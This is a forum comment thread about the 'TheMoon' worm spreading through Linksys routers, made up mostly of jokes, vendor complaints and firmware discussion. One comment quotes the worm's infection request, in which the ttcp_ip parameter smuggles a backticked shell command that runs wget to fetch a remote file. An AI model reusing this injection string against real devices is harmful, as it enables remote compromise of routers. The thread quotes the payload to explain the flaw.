Linksys Routers Exploited By "TheMoon"

UnderAttack writes "A vulnerability in many Linksys routers, allowing for unauthenticated code execution, is being used to mass-exploit various Linksys routers right now. Infected routers will start scanning for vulnerable systems themselves, leading to a very fast spread of this 'worm.'"

That's impossible

[CajunArson]

Linksys routers run Linux and Linux is Open Source. Therefore there are no bugs because theoretically someone can look at the code and fix the code.

This also means that it's impossible for bad people to look at the code and exploit the code because Open Source makes everyone honest by magic.

Oh, and by virtue of being able to look at the code, Linksys routers magically patch themselves before the bugs even come into existence!

In conclusion, Windows is the cause of all security problems.

Re: That's impossible

Slow your roll there, not all linksys run linux. Most run vxworks rtos. Only the linksys routers flashed with ddwrt firmware run linux for sure.

Re:That's impossible

[Narcocide]

Only affecting models not running Linux currently...

Re:That's impossible

[X0563511]

Last I checked vxworks is not linux...

Re:That's impossible

[FuegoFuerte]

As a result, there are now two brands of hardware that I will refuse to purchase. I swore off (and at) Belkin when I bought one of their APs and it wouldn't let me change the network for its management IP. It was hardcoded to 192.168.1.0/24, and their "customer service" response was "by design, FOAD."

I have a few of their surge suppressors, but generally anything with the Belkin name doesn't come into my house after that experience. Also, I'll never buy one of their PDUs for the datacenter - if their consumer support is that bad, why would I trust them in the enterprise?

Dear Businesses: Enterprise purchasing decisions are made by people who are also consumers who buy stuff for their homes.

Network company supplied routers vul'n

[RichMan]

Use this supplied router. Do NOT modify it.

But it has admin/admin as user name and password and is 192.168.1.1
Can I fix that.

Do NOT modify the settings on the supplied router.

*facepalm*

Model Numbers of affected devices.

Here is a list of router models mentioned in the binary:
E4200
E3200
E3000
E2500
E2100L
E2000
E1550
E1500
E1200
E1000
E900

Re:Default firmware only?

[SJHillman]

No, but it does affect routers that have smiley face stickers applied to the top or sides.

Re:Default firmware only?

[Lothsahn]

I'd love to hear a response from a tomato dev, but I'm almost sure it's not (and dd-wrt is probably not affected either). With my Tomato router, I get a 404 when I reference that URL.

The worm infects a router with the following URL: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://source/ IP]:193/0Rx.mid;fi` &StartEPI=1

It appears to be that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears it's a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.

Actually Belkin bought them from Cisco

[fullmetal55]

Belkin purchased Linksys from Cisco last year. Linksys no longer has ties to Cisco, thus the unpossible is now possible.

and Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore... Rather than fixing the firmware problem that requires the frequent reboots.

It wasn't Trolling

Trolling: "Gee, LinkSys uses Linux and it's an open source product. So much for the myth (or bullshit) that open source is more secure!" Or "See, open source is shit! Closed source would never have had this happen to it because this exploit could only have been found by seeingt he source!"

The GP, OTOH, mixed satire and sarcasm - a la "The Daily Show" and "Colbert Report" to poke fun at the false sense of security one may have with using open source and that regardless of the product we use, we all need to be vigilant with our security. Who knows what the intention of this worm is.

Also, I took the GP's comment as a little teasing at the expense of some of the rapid members of the open source community and the folks seem to jump on all the Windows failings and yet, brush aside similar failings in open source software.

I thought it was quite clever on a multitude of levels while expressing in very simple sentences.

TheMoon

[confused+one]

Jade Rabbit suffered a failure and needed additional processing resources. It has reached out and now All Your Base Are Belong to Jade.

Why is the admin port open to the public?

[EMG+at+MU]

The web administration port should not be open to the public internet by default on these routers.

Re:Is dd-wrt affected?

[CreamyG31337]

no, it's just the default firmware.
"Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue."
from the comments on https://isc.sans.edu/forums/di...

pronunciation

[dkman]

Vixin Licks? just sayin'

Re:how can i tell if my router is affected?

There's a small recessed reset button on the back of the router. You have to get a paper clip and try to push it in there. If the router starts saying "I'm sorry Dave, I can't let you do that," and hits you with an electric shock, it has been compromised.